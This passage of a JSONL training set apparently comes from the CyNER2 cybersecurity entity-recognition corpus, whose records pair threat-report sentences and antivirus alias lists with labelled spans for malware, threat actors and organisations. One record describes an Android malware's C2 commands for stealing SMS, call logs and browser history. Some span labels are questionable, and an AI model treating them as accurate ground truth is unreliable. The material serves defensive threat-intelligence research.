Win32.Trojan.WisdomEyes.16070401.9500.9979 Backdoor.Trojan Win32/Cyreho.A Trojan.DownLoad2.18592 W32.Trojan.Trojan-Backdoor-Cele TR/Dldr.Ftp.E Trojan/Win32.Unknown Trojan.Heur.VP.E82FB1 Trojan:Win32/Cyreho.A Trojan.VBRA.02524 Win32.Trojan.Dldr.Oyeu Trojan.Win32.Darkddoser W32/VB.NZ!tr Win32/Trojan.9b7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000032", "source": "cyner2_train"}} {"text": "Additionally, we have observed instances of the IsSpace and TidePool malware families being delivered via the same techniques.", "spans": {"MALWARE: IsSpace": [[48, 55]], "MALWARE: TidePool malware families": [[60, 85]]}, "info": {"id": "cyner2_train_000033", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Pccontrol.2.1 Backdoor.Pccontrol.2.1 Backdoor.PcControl!Vqgcs0rOUEs PcControl.C Backdoor.Win32.PcControl.21 Backdoor.Pccontrol.2.1 Trojan.Win32.PcControl.cbiyio Backdoor.Pccontrol.2.1 Backdoor.Win32.PcControl.21 Backdoor.Pccontrol.2.1 BackDoor.Control.21 BKDR_PCCONTROL.A W32/Risk.SRBI-7988 BDS/PcControl.21.1 Trojan[Backdoor]/Win32.PcControl Backdoor:Win32/PCControl.2_1 Backdoor.Pccontrol.2.1 Backdoor.Pccontrol.2.1 Backdoor.PcControl Backdoor.Win32.PcControl.aa Win32/PcControl.21 W32/PcCont.21!tr.bdr BackDoor.Pccontrol.C Bck/PcControl.21", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000034", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Bacterio61.A Trojan.Bacterio61.A Trojan.Bacterio61.r3 Trojan.Bacterio61.A Trojan.Bacterio61.A Trojan.Bacterio61!xosA0+L/cz0 Trojan.Dropper TROJ_BACTERIO.61 Trojan.Win32.Bacterio61 Trojan.Win32.Bacterio61.fdse Trojan.Win32.RenAll[h] PE:Trojan.Bacterio61!1073791980 Trojan.Bacterio61.A TrojWare.Win32.RenAll Trojan.Bacterio61.A Trojan.Bacterio61.Win32.1 TROJ_BACTERIO.61 W32/Virus.NFQE-4477 Trojan/Win32.Bacterio61 Win32.Troj.Bacterio61.kcloud Win-Trojan/RenAll.94208 Trojan.Bacterio61.A Win32.Trojan.Bacterio61.ddnb W32/Bacterio61.A!tr Trojan.Win32.Bacterio61.aW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000035", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.CDB.3cb9 Virus.Win32.Patched", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000036", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.4CE7 Backdoor/W32.Tropoly.C Backdoor.CPEX.Win32.21496 Trojan/Inject.aisx Trojan.Heur.E7B492 Trojan.Win32.A.Inject.48640.F TrojWare.Win32.Pincav.N Trojan.PWS.Reggin.91 BehavesLike.Win32.Ramnit.pc Trojan.Win32.Inject Trojan/Inject.hnq Troj.W32.Inject.aisx!c Trojan/Win32.OnlineGameHack.R2669 PWS-OnlineGames.ge BScope.TrojanPSW.Magania.1314 
Trojan.Inject!H2RbMIi2jvQ Trj/Inject.IR Win32/Trojan.65a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000039", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Tregwihc.Trojan Trojan.Inject.GK Worm/W32.AutoRun.114688 W32/Autorun.worm.dw W32/AutoRun.lrf TROJ_FAM_0000e93.TOMA Win32.Trojan.WisdomEyes.16070401.9500.9992 W32/Worm.FWLR-5025 Trojan.Minit Win32/Milsni.D TROJ_FAM_0000e93.TOMA Win.Worm.Autorun-376 Win32.Rootkit.Uroburos.C Trojan.Inject.GK Trojan.Win32.AutoRun.ftwn Worm.Win32.Autorun.114688.I W32.W.AutoRun.lrf!c Trojan.Inject.GK Worm.Win32.AutoRun.COB Trojan.Inject.GK Win32.HLLW.Autoruner.5122 Worm.AutoRun.Win32.35 W32/Autorun.worm.dw W32/Worm.AKXJ Worm/AutoRun.fma Worm:Win32/Yacspeel.A.dll WORM/Autorun.Byt.34 Worm/Win32.AutoRun Worm:Win32/Yacspeel.A.dll Worm/Win32.AutoRun.R1836 Trojan.Inject.GK Worm.Win32.AutoRun.byt Trj/Autorun.RN Win32/AutoRun.COB Win32.Worm.Autorun.Lohz Virus.Win32.AutoRun.sd W32/AutoRun.BDJ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000040", "source": "cyner2_train"}} {"text": "A backdoor also known as: LNK.Trojan.3171 LNK/Trojan.TPJW-5 LNK_ARGULONG.SMLNK HEUR:Trojan.WinLNK.Powecod.a LNK_ARGULONG.SMLNK LNK/Trojan.TPJW-5 HEUR:Trojan.WinLNK.Powecod.a Trojan.LNK virus.lnk.powershell.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000041", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SasfisB.Worm Win32.Worm.Wukill.D Email-Worm.Win32.Rays!O Worm.WuKill Worm.Rays.Win32.1 Worm.Wukill Win32.Worm-Email.Rays.a W32.Wullik@mm Win.Worm.Rays-1 Email-Worm.Win32.Rays.d Win32.Worm.Wukill.D Trojan.Win32.Rays.cvmxdt W32.W.Basun.lwAE Trojan.Win32.FakeFolder.wid Win32.Worm.Wukill.D Win32.Worm.Wukill.D Win32.HLLM.Xgray Email-Worm.Win32.Rays Worm.Rays.d.49152 Win32.Worm.Wukill.D I-Worm.Win32.Rays.49152 Email-Worm.Win32.Rays.d Win32.Trojan.Wukill.B Win32/Rays.worm.15024 Win32.Worm.Wukill.D SScope.Trojan.VBRA.4977 I-Worm.Wukill.B 
W32/Fawkes.A!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000043", "source": "cyner2_train"}} {"text": "The document contains an encoded Visual Basic Script VBScript typical of previous Carbanak malware.", "spans": {"MALWARE: Carbanak malware.": [[82, 99]]}, "info": {"id": "cyner2_train_000044", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Fynloski.H Win32.Trojan Trojan.MSIL.Crypt.cxp Trojan.Inject.54745 TR/PSW.Fignotok.LW Trojan-Dropper.Small!IK Trojan/Jorik.ovo TrojanDownloader:Win32/Batosecu.A Trojan/Win32.Jorik Trojan.Jorik.Fynloski.ft Trojan-Dropper.Small Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000045", "source": "cyner2_train"}} {"text": "A backdoor also known as: Joke.Jepruss Hoax.Win32.BadJoke!O Joke.Russianjep Joke.Jepruss Joke.Jepruss W32/Joke.NX Joke.JepRuss JOKE_ONLYGAME.A Win.Joke.Jep-1 Joke.Jepruss Hoax.Win32.BadJoke.JepRuss Joke.Jepruss Riskware.Win32.JepRuss.hybz Joke.Win32.FakeScreen Hoax.W32.BadJoke.JepRuss!c Joke.Jepruss Joke.Win32.Jep.Russ Joke.Jepruss Joke.Justgame Tool.BadJoke.Win32.23 JOKE_ONLYGAME.A W32/Joke.TMKA-5158 not-virus:Joke.Win32.JepRuss HackTool[Hoax]/Win32.JepRuss Win32.Joke.JepRuss.kcloud Hoax.Win32.BadJoke.JepRuss Win-Joke/Delete_Game.916512 Win32/Jep.Russ Win32.Trojan-psw.Badjoke.Lmkt Trojan.Jep!7Qg0TmyJLB0 Joke.Win32.RussianJep", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000046", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Seimon.G Trojan.Seimon.G Trojan.Seimon.G Trojan.Seimon!4f7JwSpV94c Trojan.Seimon.G TrojWare.Win32.Trojan.Seimon.G0 Trojan.Seimon.G Trojan.DownLoad.3195 BehavesLike.Win32.PWSGamania.lh W32/PhishExe.B!tr.dldr Trojan[:HEUR]/Win32.Unknown Trojan.Seimon.G Trojan/Win32.Casino BScope.Trojan-Downloader.ILoveLanch.pj Virus.Win32.Cloaker Trojan.Seimon.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000047", "source": "cyner2_train"}} 
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9563 W32/Application.THZK-5586 BehavesLike.Win32.BadFile.rc Trojan.Win32.PSW Trojan.Application.Zusy.D3D00C Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000048", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.KillFiles!O Trojan.Birele Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Risk.GBTW-1754 Ransom_Birele.R038C0DLB17 Trojan-Ransom.Win32.Birele.gss Trojan.Win32.Dropper.rpje Trojan.Win32.Scar.56320.B Troj.Ransom.W32.Birele!c Worm.Win32.Autorun.GVIT Trojan.MulDrop1.6138 Trojan.Birele.Win32.7887 BehavesLike.Win32.Ransom.fc Virus.Win32.VBInject W32/MalwareS.BBSH Trojan/Scar.pgv Trojan/Win32.KillFiles PWS:Win32/Kiction.A Trojan.Zusy.DAEF Trojan/Win32.Scar.R18936 Trojan-Ransom.Win32.Birele.gss Worm.Spreader Worm.AutoRun Win32.Trojan.Birele.Pgda W32/KillFiles.GMU!tr Win32/Trojan.Ransom.f31", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000051", "source": "cyner2_train"}} {"text": "Here is a command and control protocol fragment : Commands from C2 server parsing In total , the malicious APK handles 16 different commands : Command Endpoint Description 1 reqsmscal.php Send specified SMS message 2 reqsmscal.php Call specified number 3 reqsmscal.php Exfiltrate device info , such as phone model and OS version 4 reqsmscal.php Exfiltrate a list of all installed applications 5 reqsmscal.php Exfiltrate default browser history ( limited to a given date ) 6 reqsmscal.php Exfiltrate Chrome browser history ( limited to a given date ) 7 reqsmscal.php Exfiltrate memory card file structure 8 reqsmscal.php Record surrounding sound for 80 seconds 1 reqcalllog.php Exfiltrate all call logs 2 reqcalllog.php Exfiltrate all SMS messages 3 reqcalllog.php Upload specified file from the device to the C2 4 reqcalllog.php Download file from specified URL and save on device 5 reqcalllog.php Delete specified file 6,7,8 
reqcalllog.php Commands not yet implemented 9 reqcalllog.php Take photo ( muted audio ) with rear camera , send to C2 10 reqcalllog.php Take photo ( muted audio ) with front camera , send to C2 All observed samples with Smali injections were signed by the same debug certificate ( 0x936eacbe07f201df ) .", "spans": {}, "info": {"id": "cyner2_train_000052", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Jacard Win32.Trojan.WisdomEyes.16070401.9500.9987 W32/Trojan.YDYO-6019 Trojan-Banker.BestaFera Trojan-Banker.Win32.BestaFera.amyc Trojan.Win32.Banker.euxhdn Trojan.Win32.Z.Jacard.2528768 BehavesLike.Win32.BadFile.vh TR/Spy.Banker.vvhlz Trojan[Banker]/Win32.BestaFera TrojanDownloader:Win32/Qulkonwi.A Trojan.Jacard.D8CA Trojan-Banker.Win32.BestaFera.amyc Trj/GdSda.A Win32.Trojan-banker.Bestafera.Wmsm W32/Banker.ADUT!tr.spy Win32/Trojan.252", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000056", "source": "cyner2_train"}} {"text": "Recently the Mobile Malware Research Team of Intel Security found on Google Play a new campaign of Android/Clicker.G in dozens of published malicious apps.", "spans": {"ORGANIZATION: Mobile Malware Research Team of Intel Security": [[13, 59]], "SYSTEM: Google Play": [[69, 80]], "THREAT_ACTOR: campaign": [[87, 95]], "SYSTEM: malicious apps.": [[140, 155]]}, "info": {"id": "cyner2_train_000057", "source": "cyner2_train"}} {"text": "AlienVault Labs has extracted related samples and located the infrastructure used by attackers", "spans": {"ORGANIZATION: AlienVault Labs": [[0, 15]], "THREAT_ACTOR: attackers": [[85, 94]]}, "info": {"id": "cyner2_train_000059", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Brackash.C Trojan.Brackash.C Win32.Trojan.WisdomEyes.16070401.9500.9774 Trojan.Win32.Sadenav.b Trojan.Brackash.C Trojan.Brackash.C Brackash.dll Virus.Trojan.Win32.Sadenav Trojan/Sadenav.aic W32.Trojan.Brackash.C TR/Brackash.C100.2 Trojan/Win32.Sadenav Trojan.Brackash.C 
Trojan.Win32.Sadenav.b Trojan/Win32.Sadenav.R1894 Brackash.dll Trojan.Brackash.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000060", "source": "cyner2_train"}} {"text": "One of the most common ways to do this is by displaying advertisements to users or by offering in-app purchases IAPs.", "spans": {}, "info": {"id": "cyner2_train_000061", "source": "cyner2_train"}} {"text": "This blog post outlines the details about the campaign that we discovered.", "spans": {"THREAT_ACTOR: campaign": [[46, 54]]}, "info": {"id": "cyner2_train_000064", "source": "cyner2_train"}} {"text": "A new CC infrastructure consisting of a climbing club website.", "spans": {"SYSTEM: CC infrastructure": [[6, 23]]}, "info": {"id": "cyner2_train_000067", "source": "cyner2_train"}} {"text": "A backdoor also known as: O97M.Dropper.BR W97M.Downloader W2000M/Dldr.Rogue.aipbta HEUR.VBA.Trojan.e virus.office.qexvmc.1095", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000068", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.BackdoorSlingup.Trojan Trojan/W32.Fsysna.77824.F Heur.Win32.VBKrypt.3!O Backdoor.Slingup.MF.150 Win32.Worm.VB.rt W32/Trojan.XMLD-4299 W32.Difobot BKDR_GORYNYCH.SM Trojan.Win32.Fsysna.ccit Trojan.Win32.Fsysna.dwujaf Troj.W32.Fsysna.tnPd Trojan.DownLoader14.15241 Trojan.Fsysna.Win32.7242 BKDR_GORYNYCH.SM BehavesLike.Win32.Backdoor.lt Worm.Win32.VB W32/Trojan3.TRB Trojan/Fsysna.dgo Trojan/Win32.Fsysna Trojan.Win32.Fsysna.ccit Trojan/Win32.VBInject.R158763 Trojan.Fsysna Trojan.Reconyc Win32/VB.OOB Win32.Trojan.Fsysna.Phgj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000069", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor:MSIL/Hulpob.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000070", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Fsysna Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.HAEY-9385 
Trojan.Bisonal Trojan.Win32.Fsysna.ccap Troj.W32.Fsysna!c Trojan.DownLoad3.19183 BehavesLike.Win32.Dropper.vz Trojan.Win32.Fsysna.ccap Trojan:Win32/Korlia.C Win-Trojan/Biscon.3140 Trj/CI.A Win32.Trojan.Fsysna.Tayn W32/Fsysna.CCAP!tr Win32/Trojan.732", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000071", "source": "cyner2_train"}} {"text": "In addition, the compromised devices were pushed Trojan updates, which allowed the attackers to extend their capabilities.", "spans": {"SYSTEM: compromised devices": [[17, 36]], "MALWARE: Trojan updates,": [[49, 64]], "THREAT_ACTOR: attackers": [[83, 92]]}, "info": {"id": "cyner2_train_000072", "source": "cyner2_train"}} {"text": "In February 2016 one of the largest cyber heists was committed and subsequently disclosed.", "spans": {"THREAT_ACTOR: largest cyber heists": [[28, 48]]}, "info": {"id": "cyner2_train_000073", "source": "cyner2_train"}} {"text": "Cyber espionage actors, now designated by FireEye as APT32 OceanLotus Group, are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists.", "spans": {"THREAT_ACTOR: Cyber espionage actors,": [[0, 23]], "ORGANIZATION: FireEye": [[42, 49]], "THREAT_ACTOR: APT32 OceanLotus Group,": [[53, 76]], "ORGANIZATION: private sector companies": [[110, 134]], "ORGANIZATION: industries": [[151, 161]], "ORGANIZATION: foreign governments, dissidents,": [[185, 217]], "ORGANIZATION: journalists.": [[222, 234]]}, "info": {"id": "cyner2_train_000074", "source": "cyner2_train"}} {"text": "The infected apps in this campaign were downloaded several million times by unsuspecting users.", "spans": {"SYSTEM: infected apps": [[4, 17]], "THREAT_ACTOR: campaign": [[26, 34]]}, "info": {"id": "cyner2_train_000075", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Bot.MSIL Trojan.Win32.StartPage.czmqzt Trojan.DownLoader12.20620 BehavesLike.Win32.Backdoor.ch 
TR/Dropper.MSIL.47116 MSIL/StartPage.AI!tr Trj/CI.A Msil.Trojan.Dropper.Hqll Trojan.MSIL.StartPage MSIL3.BCNZ Trojan.MSIL.StartPage.AI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000077", "source": "cyner2_train"}} {"text": "Primarily targets users in Brazil with fake attatchments, for example: Auto_De_Infracao_e_Sua_Notificacao_493275324.exe", "spans": {}, "info": {"id": "cyner2_train_000078", "source": "cyner2_train"}} {"text": "This is named Red Leaves after strings found in the malware.", "spans": {"THREAT_ACTOR: Red Leaves": [[14, 24]], "MALWARE: malware.": [[52, 60]]}, "info": {"id": "cyner2_train_000080", "source": "cyner2_train"}} {"text": "The malware first discovery was after a highly Libyan influential Telegram account compromised via web", "spans": {"MALWARE: malware": [[4, 11]], "ORGANIZATION: highly Libyan influential": [[40, 65]], "VULNERABILITY: web": [[99, 102]]}, "info": {"id": "cyner2_train_000082", "source": "cyner2_train"}} {"text": "Recently, we saw an app that leads to a third-party app store being offered on the official iOS App Store.", "spans": {"MALWARE: app": [[20, 23]], "SYSTEM: third-party app store": [[40, 61]], "SYSTEM: official iOS App Store.": [[83, 106]]}, "info": {"id": "cyner2_train_000083", "source": "cyner2_train"}} {"text": "This paper presents ESET's findings about Operation Groundbait based on our research into the Prikormka malware family.", "spans": {"ORGANIZATION: ESET's": [[20, 26]], "THREAT_ACTOR: Operation Groundbait": [[42, 62]], "MALWARE: Prikormka malware family.": [[94, 119]]}, "info": {"id": "cyner2_train_000084", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.AutoRun.13924 W32.W.Fearso.kYUv HT_STARTPAGE_FB090419.UVPM Win32.Trojan.Delf.it HT_STARTPAGE_FB090419.UVPM Win.Trojan.Delf-1006 Trojan.Win32.Fsysna.digg TrojWare.Win32.Magania.~AD Worm.Delf.Win32.1099 Trojan[GameThief]/Win32.Nilage Trojan.Jacard.D150AA Trojan.Win32.Fsysna.digg 
HackTool.Win32.InjectDll.a Trojan.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000085", "source": "cyner2_train"}} {"text": "In the course of our research we uncovered the activity of a hacking group which has Chinese origins.", "spans": {"THREAT_ACTOR: hacking group": [[61, 74]]}, "info": {"id": "cyner2_train_000086", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/Darby.N Win32.Worm.P2p.Darby.N Worm/W32.Darby.140470 W32.W.Darby.n!c Win32.Worm.P2p.Darby.N Worm.P2P.Darby!NxHEqfnePM8 W32/Darby.M W32.HLLW.Darby Win32/Darby.N P2P-Worm.Win32.Darby.n Trojan.Win32.Darby.epif Worm.Win32.Darby.140470.B[h] Win32.Worm.P2p.Darby.N Worm.Win32.Darby.N Win32.Worm.P2p.Darby.N BehavesLike.Win32.MultiDropper.cc W32/Darby.KOEV-0225 Worm/Darby.f WORM/Darby.N W32/Darby.N!tr Worm[P2P]/Win32.Darby Win32.Worm.P2p.Darby.N Win32/Darby.worm.140470 Worm:Win32/Darby.N Virus.Win32.Heur.p Win32.Worm-p2p.Darby.Pdwh P2P-Worm.Win32.Darby Win32.Worm.P2p.Darby.N Worm/Darby.P", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000088", "source": "cyner2_train"}} {"text": "Yesterday, Microsoft patched CVE-2015-2424, a vulnerability in Microsoft Office discovered by iSIGHT Partners while monitoring the Russian cyber espionage team we call Tsar Team.", "spans": {"ORGANIZATION: Microsoft": [[11, 20]], "VULNERABILITY: vulnerability": [[46, 59]], "SYSTEM: Microsoft Office": [[63, 79]], "ORGANIZATION: iSIGHT Partners": [[94, 109]], "THREAT_ACTOR: Russian cyber espionage team": [[131, 159]], "THREAT_ACTOR: Tsar Team.": [[168, 178]]}, "info": {"id": "cyner2_train_000089", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsIemusi.2209 W32/Trojan.GCQE-8180 DDOS_HPNITOL.SM Trojan.Boht Trojan.Win32.DownLoad.bfqxfq Troj.W32.Vilsel.lmbl Trojan.DownLoad3.40817 BehavesLike.Win32.HLLPPhilis.lc Backdoor:Win32/Bezigate.B Trj/CI.A Win32/Delf.AJG Backdoor.Win32.PcClient W32/Inject.VXTT!tr", "spans": {"MALWARE: backdoor": [[2, 
10]]}, "info": {"id": "cyner2_train_000091", "source": "cyner2_train"}} {"text": "During an incident response engagement in September 2016, SecureWorks® incident response analysts observed payment card data being collected by a generic remote access trojan RAT rather than typical memory-scraping malware.", "spans": {"ORGANIZATION: SecureWorks® incident response analysts": [[58, 97]], "MALWARE: generic remote access trojan RAT": [[146, 178]], "MALWARE: typical memory-scraping malware.": [[191, 223]]}, "info": {"id": "cyner2_train_000098", "source": "cyner2_train"}} {"text": "The said attackers, who showed familiarity and in-depth knowledge of their agencies' network topology, tools, and software, were able to gain access to their targeted servers and install malware.", "spans": {"THREAT_ACTOR: attackers,": [[9, 19]], "SYSTEM: agencies' network topology, tools, and software,": [[75, 123]], "SYSTEM: targeted servers": [[158, 174]], "MALWARE: malware.": [[187, 195]]}, "info": {"id": "cyner2_train_000099", "source": "cyner2_train"}} {"text": "That attack was spearheaded by the malware ESET products detect as Diskcoder.C aka ExPetr, PetrWrap, Petya, or NotPetya.", "spans": {"MALWARE: malware": [[35, 42]], "SYSTEM: ESET products": [[43, 56]], "MALWARE: ExPetr, PetrWrap, Petya,": [[83, 107]], "MALWARE: NotPetya.": [[111, 120]]}, "info": {"id": "cyner2_train_000100", "source": "cyner2_train"}} {"text": "Early September, Skycure Research Labs detected a fake app within one of our customer's organizations, identified through our crowd-sourced intelligence policies whereby anyone running the Skycure mobile app acts as a threat detecting sensor.", "spans": {"ORGANIZATION: Skycure Research Labs": [[17, 38]], "SYSTEM: fake app": [[50, 58]], "ORGANIZATION: customer's organizations,": [[77, 102]], "SYSTEM: crowd-sourced intelligence policies": [[126, 161]], "SYSTEM: Skycure mobile app": [[189, 207]], "SYSTEM: threat detecting sensor.": [[218, 242]]}, "info": {"id": 
"cyner2_train_000101", "source": "cyner2_train"}} {"text": "A backdoor also known as: Udsdangerousobject.Multi Trojan.Scar.Win32.107576 Uds.Dangerousobject.Multi!c Trojan.Win32.Scar.qiea Trojan.Win32.Scar.eujcfc BehavesLike.Win32.Downloader.vc Trojan.Win32.Scar W32/Trojan.TSAL-4013 Trojan.Scar.kdh TR/Scar.xdjbi Trojan/Win32.Scar Trojan.Win32.Scar.qiea TrojanDropper:Win32/NukeSped.V Trojan/Win32.Scar.C2237182 Trojan.Scar Trj/GdSda.A Win32.Trojan.Scar.Hnkz Trojan.Scar!JEdUZG9Z4dw Win32/Trojan.6bc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000102", "source": "cyner2_train"}} {"text": "BlackSnake Ransomware is a new strain of malware that encrypts files and demands a ransom from victims, and is capable of performing clipper operations aimed at cryptocurrency users, according to Cyble Research and Intelligence Labs.", "spans": {"MALWARE: BlackSnake Ransomware": [[0, 21]], "MALWARE: malware": [[41, 48]], "ORGANIZATION: cryptocurrency users,": [[161, 182]], "ORGANIZATION: Cyble Research": [[196, 210]]}, "info": {"id": "cyner2_train_000103", "source": "cyner2_train"}} {"text": "For bogus applications to be profitable, they should be able to entice users into installing them.", "spans": {}, "info": {"id": "cyner2_train_000104", "source": "cyner2_train"}} {"text": "The group is highly selective in its approach and only appears to deploy its full range of tools once it establishes that the compromised organization is an intended target.", "spans": {}, "info": {"id": "cyner2_train_000107", "source": "cyner2_train"}} {"text": "It relies on spear-phishing emails sent to specific and strategic companies to conduct its campaigns.", "spans": {"ORGANIZATION: companies": [[66, 75]], "ORGANIZATION: campaigns.": [[91, 101]]}, "info": {"id": "cyner2_train_000108", "source": "cyner2_train"}} {"text": "VXRLcredit contacted us regarding an APT phishing email that included a download link to a malware being hosted on a Geocities website.", "spans": 
{"ORGANIZATION: VXRLcredit": [[0, 10]], "THREAT_ACTOR: APT": [[37, 40]], "MALWARE: malware": [[91, 98]]}, "info": {"id": "cyner2_train_000109", "source": "cyner2_train"}} {"text": "The group's activities have gained attention due to their ongoing use of DLL hijacking via Microsoft Distributed Transaction Coordinator MSDTC to extract and launch ransomware payloads.", "spans": {"THREAT_ACTOR: The group's": [[0, 11]], "SYSTEM: Microsoft Distributed Transaction Coordinator MSDTC": [[91, 142]], "MALWARE: ransomware payloads.": [[165, 185]]}, "info": {"id": "cyner2_train_000110", "source": "cyner2_train"}} {"text": "A backdoor also known as: BKDR_KONUS.N Trojan.DownLoader24.32510 BKDR_KONUS.N BehavesLike.Win32.Trojan.fc Trojan.Razy.D27268 Trojan.Win32.Z.Razy.308742 Backdoor:Win32/Konus.A TScope.Malware-Cryptor.SB Trj/GdSda.A Win32/Trojan.797", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000114", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.91D0 RiskWare.GameHack Win32.Trojan.WisdomEyes.16070401.9500.9693 Trojan.Adylkuzz Win32.Application.PUPStudio.B Trojan.Win32.PUPStudio.expchr BehavesLike.Win32.Downloader.rc Trojan.Win32.VMProtect TR/AvKill.fkiqo Trojan:Win32/Avkill.E Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000115", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exp.OLE.CVE-2013-1331.A Exploit.OLE2.CVE-2013-1331.a!c Trojan.Mdropper Win32/Exploit.CVE-2013-1331.A TROJ_MDROPPR.ZMA Doc.Exploit.CVE_2013_1331-1 Exploit.OLE2.CVE-2013-1331.a Trojan.Dos.CVE-2013-1331.dftbiw DOC.S.CVE-2013-1331.115712 Win32.Exploit.Msoffice.Auto Exploit:W32/CVE-2013-1331.A TROJ_MDROPPR.ZMA EXP/CVE-2013-1331.A Exploit.OLE2.CVE-2013-1331.a Exploit.OLE2 MSWord/ScriptBridge.NT!exploit.CVE20131331 Win32/Trojan.Exploit.124", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000116", "source": "cyner2_train"}} {"text": "By utilizing stolen credentials, the actor was 
able to manipulate the update server for M.E.Doc to proxy connections to an actor-controlled server.", "spans": {"THREAT_ACTOR: actor": [[37, 42]], "SYSTEM: server": [[77, 83]], "MALWARE: M.E.Doc": [[88, 95]]}, "info": {"id": "cyner2_train_000119", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.BrontokTiwiHV.Worm Worm/W32.Brontok.87061 Email-Worm.Win32.Brontok!O Worm.Rahiwi.A3 W32/Brontok.am Trojan.Heur.fmMfr5EYVjjib Win32.Trojan.VB.bb W32.Rahiwi.A Win32/Tnega.OPKOELC WORM_BRONTOK.SMB Email-Worm.Win32.Brontok.am Trojan.Win32.Brontok.dmfkjc I-Worm.Win32.A.Brontok.58368[UPX] Worm.Brontok.Win32.1133 WORM_BRONTOK.SMB BehavesLike.Win32.YahLover.mt Email-Worm.Win32.Brontok Worm.Brontok.bt W32.Worm.Rahiwi WORM/Brontok.AM.15 Worm[Email]/Win32.Brontok W32.W.Brontok.mjGp Email-Worm.Win32.Brontok.am Worm:Win32/Rahiwi.A Worm/Win32.Brontok.C47526 Worm.Brontok I-Worm.VB.ET Worm.Win32.Brontok.aab I-Worm.Brontok!pJaU4TE3gZk W32/AutoRun.RPV!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000120", "source": "cyner2_train"}} {"text": "Traditionally, the group attacked organizations in the US as well as other targets.", "spans": {"THREAT_ACTOR: group": [[19, 24]], "ORGANIZATION: organizations": [[34, 47]], "ORGANIZATION: targets.": [[75, 83]]}, "info": {"id": "cyner2_train_000121", "source": "cyner2_train"}} {"text": "Last month at the CERT-EU Conference in Brussels, Belgium, Volexity gave a presentation on a recent evolution in how attackers are maintaining persistence within victim networks.", "spans": {"ORGANIZATION: CERT-EU Conference": [[18, 36]], "ORGANIZATION: Volexity": [[59, 67]], "THREAT_ACTOR: attackers": [[117, 126]], "SYSTEM: victim networks.": [[162, 178]]}, "info": {"id": "cyner2_train_000122", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojandownloader.Tedekeh BehavesLike.Win32.AdwareDealPly.tc TrojanDownloader:Win32/Tedekeh.A PUP.Optional.BundleInstaller Trj/CI.A", "spans": {"MALWARE: 
